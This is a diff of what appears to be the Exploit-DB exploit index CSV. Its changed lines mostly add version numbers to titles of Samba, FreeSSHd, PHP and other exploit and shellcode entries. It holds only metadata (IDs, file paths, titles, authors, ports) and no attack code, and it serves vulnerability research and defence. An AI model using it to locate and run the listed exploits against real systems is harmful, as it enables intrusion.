31576,platforms/windows/local/31576.rb,"Microsoft Windows - TrackPopupMenuEx Win32k NULL Page (MS13-081) (Metasploit)",2014-02-11,Metasploit,windows,local,0
31643,platforms/windows/local/31643.rb,"Easy CD-DA Recorder - '.pls' Buffer Overflow (Metasploit)",2014-02-13,Metasploit,windows,local,0
31667,platforms/windows/local/31667.txt,"Microsoft Windows - SeImpersonatePrivilege - Privilege Escalation",2008-04-17,"Cesar Cerrudo",windows,local,0
@ -8186,7 +8186,7 @@ id,file,description,date,author,platform,type,port
33791,platforms/arm/local/33791.rb,"Adobe Reader for Android - addJavascriptInterface Exploit (Metasploit)",2014-06-17,Metasploit,arm,local,0
33799,platforms/solaris/local/33799.sh,"Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities",2010-03-24,"Larry W. Cashdollar",solaris,local,0
33808,platforms/linux/local/33808.c,"Docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - Privilege Escalation PoC (gid)",2014-06-21,"Vitaly Nikolenko",linux,local,0
33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - Privilege Escalation PoC (SGID)",2014-06-21,"Vitaly Nikolenko",linux,local,0
33892,platforms/windows/local/33892.rb,"Microsoft .NET Deployment Service - IE Sandbox Escape (MS14-009) (Metasploit)",2014-06-27,Metasploit,windows,local,0
33893,platforms/windows/local/33893.rb,"Microsoft Registry Symlink - IE Sandbox Escape (MS13-097) (Metasploit)",2014-06-27,Metasploit,windows,local,0
33899,platforms/linux/local/33899.txt,"Chkrootkit 0.49 - Privilege Escalation",2014-06-28,"Thomas Stangner",linux,local,0
@ -9129,7 +9129,7 @@ id,file,description,date,author,platform,type,port
1742,platforms/linux/remote/1742.c,"MySQL 4.1.18 / 5.0.20 - Local+Remote Information Leakage Exploit",2006-05-02,"Stefano Di Paola",linux,remote,0
1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b - R_RemapShader() Remote Client Buffer Overflow",2006-05-05,landser,linux,remote,0
1776,platforms/windows/remote/1776.c,"Medal of Honor - (getinfo) Remote Buffer Overflow",2006-05-10,RunningBon,windows,remote,12203
1787,platforms/windows/remote/1787.py,"freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow",2006-05-15,"Tauqeer Ahmad",windows,remote,22
1787,platforms/windows/remote/1787.py,"FreeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow",2006-05-15,"Tauqeer Ahmad",windows,remote,22
1788,platforms/windows/remote/1788.pm,"PuTTy.exe 0.53 - (Validation) Remote Buffer Overflow (Metasploit)",2006-05-15,y0,windows,remote,0
1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Patched EXE)",2006-05-16,redsand,multiple,remote,5900
1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)",2006-05-15,"H D Moore",multiple,remote,5900
@ -9637,7 +9637,7 @@ id,file,description,date,author,platform,type,port
5746,platforms/windows/remote/5746.html,"Black Ice Software Inc Barcode SDK - 'BITiff.ocx' Remote Buffer Overflow (1)",2008-06-05,shinnai,windows,remote,0
5747,platforms/windows/remote/5747.html,"Black Ice Software Inc Barcode SDK - 'BITiff.ocx' Remote Buffer Overflow (2)",2008-06-05,shinnai,windows,remote,0
5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities",2008-06-05,shinnai,windows,remote,0
5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - Authenticated Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22
5751,platforms/windows/remote/5751.pl,"FreeSSHd 1.2.1 - Authenticated Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22
5777,platforms/windows/remote/5777.html,"Black Ice Software Annotation Plugin - 'BiAnno.ocx' Remote Buffer Overflow",2008-06-10,shinnai,windows,remote,0
5778,platforms/windows/remote/5778.html,"Black Ice Software Annotation Plugin - (BiAnno.ocx) Buffer Overflow (2)",2008-06-10,shinnai,windows,remote,0
5790,platforms/multiple/remote/5790.txt,"SNMPv3 - HMAC Validation error Remote Authentication Bypass",2008-06-12,"Maurizio Agazzini",multiple,remote,161
@ -9835,7 +9835,7 @@ id,file,description,date,author,platform,type,port
8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0
8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0
8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 - (Cross-Site Scripting) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0
8295,platforms/windows/remote/8295.pl,"FreeSSHd 1.2.1 - (rename) Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,windows,remote,22
8295,platforms/windows/remote/8295.pl,"FreeSSHd 1.2.1 - 'rename' Command Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,windows,remote,22
8316,platforms/hardware/remote/8316.txt,"NOKIA Siemens FlexiISN 3.1 - Multiple Authentication Bypass Vulnerabilities",2009-03-30,TaMBaRuS,hardware,remote,0
8321,platforms/windows/remote/8321.py,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow",2009-03-30,Encrypt3d.M!nd,windows,remote,0
8332,platforms/windows/remote/8332.txt,"PrecisionID Datamatrix - ActiveX Arbitrary File Overwrite",2009-03-31,DSecRG,windows,remote,0
@ -10428,8 +10428,8 @@ id,file,description,date,author,platform,type,port
16326,platforms/solaris/remote/16326.rb,"Solaris - ypupdated Command Execution (Metasploit)",2010-07-25,Metasploit,solaris,remote,0
16327,platforms/solaris/remote/16327.rb,"Solaris in.TelnetD - TTYPROMPT Buffer Overflow (Metasploit)",2010-06-22,Metasploit,solaris,remote,0
16328,platforms/solaris/remote/16328.rb,"Sun Solaris Telnet - Remote Authentication Bypass (Metasploit)",2010-06-22,Metasploit,solaris,remote,0
16329,platforms/solaris/remote/16329.rb,"Samba (Solaris) - lsa_io_trans_names Heap Overflow (Metasploit)",2010-04-05,Metasploit,solaris,remote,0
16330,platforms/solaris_sparc/remote/16330.rb,"Samba (Solaris SPARC) - trans2open Overflow (Metasploit)",2010-06-21,Metasploit,solaris_sparc,remote,0
16329,platforms/solaris/remote/16329.rb,"Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,solaris,remote,0
16330,platforms/solaris_sparc/remote/16330.rb,"Samba 2.2.8 (Solaris SPARC) - 'trans2open' Overflow (Metasploit)",2010-06-21,Metasploit,solaris_sparc,remote,0
16331,platforms/windows/remote/16331.rb,"Veritas Backup Exec Name Service - Overflow Exploit (Metasploit)",2010-06-22,Metasploit,windows,remote,0
16332,platforms/windows/remote/16332.rb,"Veritas Backup Exec Windows - Remote Agent Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
16333,platforms/windows/remote/16333.rb,"Microsoft Windows Media Services - ConnectFunnel Stack Buffer Overflow (MS10-025) (Metasploit)",2010-04-28,Metasploit,windows,remote,0
@ -10559,7 +10559,7 @@ id,file,description,date,author,platform,type,port
16458,platforms/windows/remote/16458.rb,"POP Peeper 3.4 - UIDL Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0
16459,platforms/windows/remote/16459.rb,"Talkative IRC 0.4.4.16 - Response Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
16460,platforms/windows/remote/16460.rb,"SecureCRT 4.0 Beta 2 SSH1 - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
16461,platforms/windows/remote/16461.rb,"freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16461,platforms/windows/remote/16461.rb,"FreeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16462,platforms/windows/remote/16462.rb,"freeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16463,platforms/windows/remote/16463.rb,"PuTTy.exe 0.53 - Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
16464,platforms/windows/remote/16464.rb,"ISS - 'PAM.dll' ICQ Parser Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
@ -10877,9 +10877,9 @@ id,file,description,date,author,platform,type,port
16853,platforms/linux/remote/16853.rb,"Berlios GPSD - Format String (Metasploit)",2010-04-30,Metasploit,linux,remote,0
16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 (Access Point) - apply.cgi Buffer Overflow (Metasploit)",2010-09-24,Metasploit,hardware,remote,0
16855,platforms/linux/remote/16855.rb,"PeerCast 0.1216 (Linux) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0
16859,platforms/linux/remote/16859.rb,"Samba (Linux) - lsa_io_trans_names Heap Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0
16860,platforms/linux/remote/16860.rb,"Samba (Linux/x86) - chain_reply Memory Corruption (Metasploit)",2010-09-04,Metasploit,linux,remote,0
16861,platforms/linux/remote/16861.rb,"Samba (Linux x86) - trans2open Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0
16859,platforms/linux/remote/16859.rb,"Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0
16860,platforms/linux/remote/16860.rb,"Samba 3.3.12 (Linux/x86) - 'chain_reply' Memory Corruption (Metasploit)",2010-09-04,Metasploit,linux,remote,0
16861,platforms/linux/remote/16861.rb,"Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0
16862,platforms/hardware/remote/16862.rb,"Apple iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,hardware,remote,0
16863,platforms/osx/remote/16863.rb,"AppleFileServer (OSX) - LoginExt PathName Overflow (Metasploit)",2010-09-20,Metasploit,osx,remote,0
16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client (OSX) - Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0
@ -10893,12 +10893,12 @@ id,file,description,date,author,platform,type,port
16872,platforms/osx/remote/16872.rb,"WebSTAR FTP Server - USER Overflow (Metasploit)",2010-09-20,Metasploit,osx,remote,0
16873,platforms/osx/remote/16873.rb,"Apple QuickTime (Mac OSX) - RTSP Content-Type Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0
16874,platforms/osx/remote/16874.rb,"Apple Mac OSX EvoCam Web Server - HTTP GET Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0
16875,platforms/osx/remote/16875.rb,"Samba (OSX) - lsa_io_trans_names Heap Overflow (Metasploit)",2010-04-05,Metasploit,osx,remote,0
16876,platforms/osx_ppc/remote/16876.rb,"Samba (OSX/PPC) - trans2open Overflow (Metasploit)",2010-06-21,Metasploit,osx_ppc,remote,0
16875,platforms/osx/remote/16875.rb,"Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,osx,remote,0
16876,platforms/osx_ppc/remote/16876.rb,"Samba 2.2.8 (OSX/PPC) - 'trans2open' Overflow (Metasploit)",2010-06-21,Metasploit,osx_ppc,remote,0
16877,platforms/irix/remote/16877.rb,"Irix LPD tagprinter - Command Execution (Metasploit) (2)",2010-10-06,Metasploit,irix,remote,0
16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0
16879,platforms/freebsd/remote/16879.rb,"Xtacacsd 4.1.2 - report() Buffer Overflow (Metasploit) (2)",2010-05-09,Metasploit,freebsd,remote,0
16880,platforms/linux/remote/16880.rb,"Samba (*BSD x86) - trans2open Overflow Exploit (Metasploit)",2010-06-17,Metasploit,linux,remote,0
16880,platforms/linux/remote/16880.rb,"Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,linux,remote,0
16887,platforms/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0
16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,linux,remote,0
16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution (Metasploit)",2010-09-20,Metasploit,php,remote,0
@ -11187,7 +11187,7 @@ id,file,description,date,author,platform,type,port
18812,platforms/windows/remote/18812.rb,"McAfee Virtual Technician MVTControl 6.3.0.1911 - GetObject (Metasploit)",2012-05-01,Metasploit,windows,remote,0
18818,platforms/windows/remote/18818.py,"SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection",2012-05-01,muts,windows,remote,0
18825,platforms/windows/remote/18825.rb,"VideoLAN VLC Media Player 2.0.0 - Mms Stream Handling Buffer Overflow (Metasploit)",2012-05-03,Metasploit,windows,remote,0
18834,platforms/php/remote/18834.rb,"PHP - CGI Argument Injection (Metasploit)",2012-05-04,Metasploit,php,remote,0
18834,platforms/php/remote/18834.rb,"PHP 5.3.12/5.4.2 - CGI Argument Injection (Metasploit)",2012-05-04,Metasploit,php,remote,0
18836,platforms/php/remote/18836.py,"PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection",2012-05-05,rayh4c,php,remote,0
18847,platforms/windows/remote/18847.rb,"Mozilla Firefox 7 / 8 <= 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit)",2012-05-09,Metasploit,windows,remote,0
18866,platforms/windows/remote/18866.rb,"Distinct TFTP 3.01 - Writable Directory Traversal Execution (Metasploit)",2012-05-12,Metasploit,windows,remote,0
@ -11274,7 +11274,7 @@ id,file,description,date,author,platform,type,port
19223,platforms/multiple/remote/19223.txt,"FloosieTek FTGate 2.1 - Web File Access",1999-05-25,Marc,multiple,remote,0
19224,platforms/windows/remote/19224.c,"Computalynx CMail 2.3 - Web File Access",1999-05-25,Marc,windows,remote,0
19226,platforms/linux/remote/19226.c,"University of Washington pop2d 4.4 - Buffer Overflow",1999-05-26,"Chris Evans",linux,remote,0
19231,platforms/windows/remote/19231.rb,"PHP - apache_request_headers Function Buffer Overflow (Metasploit)",2012-06-17,Metasploit,windows,remote,0
19231,platforms/windows/remote/19231.rb,"PHP 5.4.3 - apache_request_headers Function Buffer Overflow (Metasploit)",2012-06-17,Metasploit,windows,remote,0
19236,platforms/solaris/remote/19236.txt,"Solaris 7.0 Coredump - Exploit",1996-08-03,"Jungseok Roh",solaris,remote,0
19237,platforms/aix/remote/19237.txt,"Gordano NTMail 3.0/5.0 - SPAM Relay",1999-06-08,Geo,aix,remote,0
19239,platforms/windows/remote/19239.txt,"Microsoft IIS (Windows NT 4.0/SP1/SP2/SP3/SP4/SP5) - IIS IDC Path Mapping",1999-06-04,"Scott Danahy",windows,remote,0
@ -12281,7 +12281,7 @@ id,file,description,date,author,platform,type,port
21846,platforms/java/remote/21846.rb,"Oracle Business Transaction Management FlashTunnelService - Remote Code Execution (Metasploit)",2012-10-10,Metasploit,java,remote,7001
21847,platforms/windows/remote/21847.rb,"Avaya IP Office Customer Call Reporter - ImageUpload.ashx Remote Command Execution (Metasploit)",2012-10-10,Metasploit,windows,remote,0
21849,platforms/unix/remote/21849.rb,"ZEN Load Balancer Filelog - Command Execution (Metasploit)",2012-10-10,Metasploit,unix,remote,444
21850,platforms/linux/remote/21850.rb,"Samba - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit)",2012-10-10,Metasploit,linux,remote,0
21850,platforms/linux/remote/21850.rb,"Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit)",2012-10-10,Metasploit,linux,remote,0
21851,platforms/unix/remote/21851.rb,"Webmin 1.580 - /file/show.cgi Remote Command Execution (Metasploit)",2012-10-10,Metasploit,unix,remote,10000
21852,platforms/unix/remote/21852.rb,"QNX QCONN - Remote Command Execution (Metasploit)",2012-10-10,Metasploit,unix,remote,0
21853,platforms/unix/remote/21853.txt,"Apache Tomcat 3/4 - DefaultServlet File Disclosure",2002-09-24,"Rossen Raykov",unix,remote,0
@ -12605,7 +12605,7 @@ id,file,description,date,author,platform,type,port
23073,platforms/windows/remote/23073.txt,"MySQL 5.1/5.5 (Windows) - 'MySQLJackpot' Remote Root Exploit",2012-12-02,kingcope,windows,remote,0
23074,platforms/windows/remote/23074.txt,"IBM System Director Agent - Remote System Level Exploit",2012-12-02,kingcope,windows,remote,0
23079,platforms/windows/remote/23079.txt,"freeFTPd - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
23080,platforms/windows/remote/23080.txt,"FreeSSHD 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
23080,platforms/windows/remote/23080.txt,"FreeSSHd 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Unauthenticated User Enumeration",2012-12-02,kingcope,multiple,remote,0
23082,platforms/linux/remote/23082.txt,"(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Authentication Bypass Remote Exploit",2012-12-02,kingcope,linux,remote,0
23083,platforms/windows/remote/23083.txt,"MySQL - Windows Remote System Level Exploit (Stuxnet technique)",2012-12-02,kingcope,windows,remote,0
@ -12901,7 +12901,7 @@ id,file,description,date,author,platform,type,port
24121,platforms/osx/remote/24121.txt,"Apple Mac OSX 10.3.x - Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",osx,remote,0
24125,platforms/windows/remote/24125.txt,"Microsoft Windows XP - Self-Executing Folder",2004-05-17,"Roozbeh Afrasiabi",windows,remote,0
24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - Get Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0
24133,platforms/windows/remote/24133.rb,"FreeSSHD - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,windows,remote,0
24133,platforms/windows/remote/24133.rb,"FreeSSHd 1.2.6 - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,windows,remote,0
24136,platforms/linux/remote/24136.txt,"KDE Konqueror 3.x - Embedded Image URI Obfuscation",2004-05-18,"Drew Copley",linux,remote,0
24137,platforms/multiple/remote/24137.txt,"Netscape Navigator 7.1 - Embedded Image URI Obfuscation",2004-05-19,"Lyndon Durham",multiple,remote,0
24140,platforms/hardware/remote/24140.txt,"Netgear RP114 3.26 - Content Filter Bypass",2004-05-24,"Marc Ruef",hardware,remote,0
@ -13519,7 +13519,7 @@ id,file,description,date,author,platform,type,port
28760,platforms/php/remote/28760.php,"PHP 3 < 5 - ZendEngine ECalloc Integer Overflow",2006-10-05,anonymous,php,remote,0
28765,platforms/windows/remote/28765.c,"Computer Associates Products Message Engine RPC Server - Multiple Buffer Overflow Vulnerabilities (1)",2006-10-05,LSsec.com,windows,remote,0
28766,platforms/windows/remote/28766.py,"Computer Associates Products Message Engine RPC Server - Multiple Buffer Overflow Vulnerabilities (2)",2006-10-05,LSsec.com,windows,remote,0
28809,platforms/windows/remote/28809.rb,"HP LoadRunner - magentproc.exe Overflow (Metasploit)",2013-10-08,Metasploit,windows,remote,443
28809,platforms/windows/remote/28809.rb,"HP LoadRunner - 'magentproc.exe' Overflow (Metasploit)",2013-10-08,Metasploit,windows,remote,443
28810,platforms/unix/remote/28810.rb,"GestioIP - Remote Command Execution (Metasploit)",2013-10-08,Metasploit,unix,remote,0
28835,platforms/novell/remote/28835.pl,"Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow (1)",2006-10-21,"Manuel Santamarina Suarez",novell,remote,0
28836,platforms/novell/remote/28836.c,"Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow (2)",2006-10-30,Expanders,novell,remote,0
@ -14753,7 +14753,7 @@ id,file,description,date,author,platform,type,port
37628,platforms/hardware/remote/37628.rb,"D-Link - Cookie Command Execution (Metasploit)",2015-07-17,Metasploit,hardware,remote,0
37647,platforms/multiple/remote/37647.txt,"Apache Struts2 - Skill Name Remote Code Execution",2012-08-23,kxlzx,multiple,remote,0
37655,platforms/windows/remote/37655.c,"Adobe Pixel Bender Toolkit2 - 'tbbmalloc.dll' Multiple DLL Loading Code Execution Vulnerabilities",2012-08-23,coolkaveh,windows,remote,0
37688,platforms/php/remote/37688.txt,"PHP - 'header()' HTTP Header Injection",2011-10-06,"Mr. Tokumaru",php,remote,0
37688,platforms/php/remote/37688.txt,"PHP 5.3.11/5.4.0RC2 - 'header()' HTTP Header Injection",2011-10-06,"Mr. Tokumaru",php,remote,0
37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' - Arbitrary File Upload (Metasploit)",2015-07-21,Metasploit,java,remote,0
37668,platforms/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",windows,remote,0
37671,platforms/multiple/remote/37671.txt,"Websense Content Gateway - Multiple Cross-Site Scripting Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",multiple,remote,0
@ -15061,11 +15061,11 @@ id,file,description,date,author,platform,type,port
40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
40445,platforms/windows/remote/40445.txt,"DWebPro 8.4.2 - Multiple Vulnerabilities",2016-10-03,Tulpa,windows,remote,0
40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow",2016-10-03,Tulpa,windows,remote,80
40455,platforms/windows/remote/40455.py,"VX Search Enterprise 9.0.26 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40456,platforms/windows/remote/40456.py,"Sync Breeze Enterprise 8.9.24 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40457,platforms/windows/remote/40457.py,"Dup Scout Enterprise 9.0.28 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40458,platforms/windows/remote/40458.py,"Disk Sorter Enterprise 9.0.24 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40459,platforms/windows/remote/40459.py,"Disk Savvy Enterprise 9.0.32 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40455,platforms/windows/remote/40455.py,"VX Search Enterprise 9.0.26 - 'Login' Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40456,platforms/windows/remote/40456.py,"Sync Breeze Enterprise 8.9.24 - 'Login' Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40457,platforms/windows/remote/40457.py,"Dup Scout Enterprise 9.0.28 - 'Login' Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40458,platforms/windows/remote/40458.py,"Disk Sorter Enterprise 9.0.24 - 'Login' Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40459,platforms/windows/remote/40459.py,"Disk Savvy Enterprise 9.0.32 - 'Login' Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40472,platforms/hardware/remote/40472.py,"Billion Router 7700NR4 - Remote Command Execution",2016-10-06,R-73eN,hardware,remote,0
40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0
40491,platforms/multiple/remote/40491.py,"HP Client 9.1/9.0/8.1/7.9 - Command Injection",2016-10-10,SlidingWindow,multiple,remote,0
@ -15109,12 +15109,13 @@ id,file,description,date,author,platform,type,port
40805,platforms/multiple/remote/40805.rb,"Dlink DIR Routers - Unauthenticated HNAP Login Stack Buffer Overflow (Metasploit)",2016-11-21,Metasploit,multiple,remote,80
40813,platforms/hardware/remote/40813.txt,"Crestron AM-100 - Multiple Vulnerabilities",2016-11-22,"Zach Lanier",hardware,remote,0
40824,platforms/multiple/remote/40824.py,"GNU Wget < 1.18 - Access List Bypass / Race Condition",2016-11-24,"Dawid Golunski",multiple,remote,80
40830,platforms/windows/remote/40830.py,"VX Search Enterprise 9.1.12 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40831,platforms/windows/remote/40831.py,"Sync Breeze Enterprise 9.1.16 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40833,platforms/windows/remote/40833.py,"Disk Sorter Enterprise 9.1.12 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40832,platforms/windows/remote/40832.py,"Dup Scout Enterprise 9.1.14 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40834,platforms/windows/remote/40834.py,"Disk Savvy Enterprise 9.1.14 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40835,platforms/windows/remote/40835.py,"Disk Pulse Enterprise 9.1.16 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40830,platforms/windows/remote/40830.py,"VX Search Enterprise 9.1.12 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40831,platforms/windows/remote/40831.py,"Sync Breeze Enterprise 9.1.16 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40833,platforms/windows/remote/40833.py,"Disk Sorter Enterprise 9.1.12 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40832,platforms/windows/remote/40832.py,"Dup Scout Enterprise 9.1.14 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40834,platforms/windows/remote/40834.py,"Disk Savvy Enterprise 9.1.14 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40835,platforms/windows/remote/40835.py,"Disk Pulse Enterprise 9.1.16 - 'Login' Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
40854,platforms/windows/remote/40854.py,"Disk Savvy Enterprise 9.1.14 - 'GET' Buffer Overflow",2016-12-01,vportal,windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -15730,7 +15731,7 @@ id,file,description,date,author,platform,type,port
242,platforms/cgi/webapps/242.pl,"Fastgraf's whois.cgi - Remote Command Execution",2001-01-12,"Marco van Berkum",cgi,webapps,0
289,platforms/cgi/webapps/289.pl,"sendtemp.pl - Read Access to Files",2001-03-04,"Tom Parker",cgi,webapps,0
309,platforms/php/webapps/309.c,"phpMyAdmin 2.5.7 - Remote code Injection",2004-07-04,"Nasir Simbolon",php,webapps,0
384,platforms/php/webapps/384.txt,"PHP - (php-exec-dir) Patch Command Access Restriction Bypass",2004-08-08,VeNoMouS,php,webapps,0
384,platforms/php/webapps/384.txt,"PHP 4.3.7 - (php-exec-dir) Patch Command Access Restriction Bypass",2004-08-08,VeNoMouS,php,webapps,0
406,platforms/php/webapps/406.pl,"phpMyWebhosting - SQL Injection",2004-08-20,"Noam Rathaus",php,webapps,0
407,platforms/cgi/webapps/407.txt,"AWStats 5.0 < 6.3 - Input Validation Hole in 'logfile'",2004-08-21,"Johnathan Bat",cgi,webapps,0
430,platforms/php/webapps/430.txt,"TorrentTrader 1.0 RC2 - SQL Injection",2004-09-01,aCiDBiTS,php,webapps,0
@ -16360,7 +16361,7 @@ id,file,description,date,author,platform,type,port
2142,platforms/php/webapps/2142.txt,"ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion",2006-08-07,"Mehmet Ince",php,webapps,0
2143,platforms/php/webapps/2143.pl,"TWiki 4.0.4 - (configure) Remote Command Execution",2006-08-07,"Javier Olascoaga",php,webapps,0
2146,platforms/php/webapps/2146.txt,"docpile:we 0.2.2 - (INIT_PATH) Remote File Inclusion",2006-08-08,"Mehmet Ince",php,webapps,0
2148,platforms/php/webapps/2148.txt,"phNNTP 1.3 - (article-raw.php) Remote File Inclusion",2006-08-08,Drago84,php,webapps,80
2148,platforms/php/webapps/2148.txt,"phNNTP 1.3 - 'article-raw.php' Remote File Inclusion",2006-08-08,Drago84,php,webapps,80
2149,platforms/php/webapps/2149.txt,"Hitweb 4.2.1 - (REP_INC) Remote File Inclusion",2006-08-08,Drago84,php,webapps,0
2150,platforms/asp/webapps/2150.txt,"CLUB-Nuke [XP] 2.0 LCID 2048 (Turkish Version) - SQL Injection",2006-08-08,ASIANEAGLE,asp,webapps,0
2151,platforms/php/webapps/2151.txt,"Cwfm 0.9.1 - 'Language' Remote File Inclusion",2006-08-08,"Philipp Niedziela",php,webapps,80
@ -16615,7 +16616,7 @@ id,file,description,date,author,platform,type,port
2468,platforms/php/webapps/2468.txt,"BBaCE 3.5 - (includes/functions.php) Remote File Inclusion",2006-10-02,SpiderZ,php,webapps,0
2469,platforms/php/webapps/2469.pl,"JAF CMS 4.0 RC1 - 'forum.php' Remote File Inclusion",2006-10-03,Kacper,php,webapps,0
2470,platforms/php/webapps/2470.txt,"phpMyProfiler 0.9.6 - Remote File Inclusion",2006-10-03,mozi,php,webapps,0
